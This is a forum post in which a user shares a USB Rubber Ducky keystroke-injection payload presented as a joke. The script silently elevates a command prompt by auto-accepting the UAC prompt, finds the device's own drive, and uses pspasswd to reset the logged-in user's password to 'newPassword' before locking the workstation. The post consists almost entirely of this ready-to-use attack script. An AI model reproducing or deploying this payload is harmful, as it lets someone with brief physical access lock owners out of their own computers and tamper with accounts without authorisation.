Hey folks,
got my duck yesterday and made my first little payload for it. Its a very simple one but i think its quite funny.
REM Changes the current users password and locks the machine
REM
REM Firmware: c_duck_v2.1.hex (needs SD Card access)
REM sd card label: DUCKY
REM needs pspasswd.exe from pstools from
REM http://technet.microsoft.com/de-de/sysinternals/bb896649.aspx
REM
REM Target: Windows Vista/7/8, Win32/x64
REM Props to the hak5 forum
REM *** UAC Bypass
DELAY 2000
GUI r
DELAY 200
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1000
ALT j
DELAY 500
BACKSPACE
REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Run PsPasswd on Ducky Drive
REM *** Change Password of current user to 'newPassword'
STRING %duck%\pspasswd %username% newPassword
ENTER
DELAY 1000
STRING rundll32.exe user32.dll, LockWorkStation
ENTER
DELAYs probably not optimal.
Regards
